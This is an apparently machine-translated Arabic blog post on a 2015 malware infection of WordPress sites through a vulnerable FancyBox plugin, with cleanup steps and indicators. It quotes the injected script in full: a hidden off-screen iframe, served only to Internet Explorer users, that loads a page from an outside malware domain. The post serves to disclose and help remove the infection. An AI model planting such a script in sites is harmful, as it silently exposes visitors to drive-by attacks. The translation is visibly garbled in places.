في وقت سابق من هذا الاسبوع عدد من المواقع، وبلوق WordPress، تلقيت تحذيرات من عدوى البرامج الضارة من خلال المواقع جوجل.
المشكلة التي المواقع جوجل يشار إلى هو وجود سمك القد / سيناريو iframe malware المواقع المصدر.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>ويبدو أنه هو حساسية a المساعدالمكتسبات FancyBox لـ Wordصحافة التي كانت حتى لم تم تحديثها أمس (05.02.2015) لفترة طويلة.
حل هذه المشكلة و تطهير المواقع الفيروسات مع هذه البرامج الضارة ، بسيطة نسبيا.
1. قم بتعطيل المكون الإضافي FancyBox.
2. احذف جميع ملفات FancyBox الإضافية من الخادم (عبر FTP)
3. قم بتثبيت الإصدار الجديد من المكون الإضافي (Fancybox 3.0.4)
FancyBox لـ WordPress 3.0.4
- إعادة تسمية الإعداد المتأثر بمشكلة الأمان المذكورة في 3.0.3. يجب أن يؤدي هذا إلى منع ظهور الشفرة الضارة على المواقع التي يوجد بها المكون الإضافي updateد دون إزالة الشيفرة الخبيثة.
FancyBox لـ WordPress 3.0.3
- الثابتة قضية أمنية.
معلومات البرامج الضارة:
نوع العقار: الإطار من إعادة توجيه
TARGET: WordPress صندوق فاخر
DOMAIN البرمجيات الخبيثة: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
البرامج الضارة RAW الرموز:
تمت كتابة البرامج الضارة: if (navigator.userAgent.match(/msie/i)) { document.write(‘
قم بإزالة البرامج الضارة من ملف WordPress موقع الكتروني.
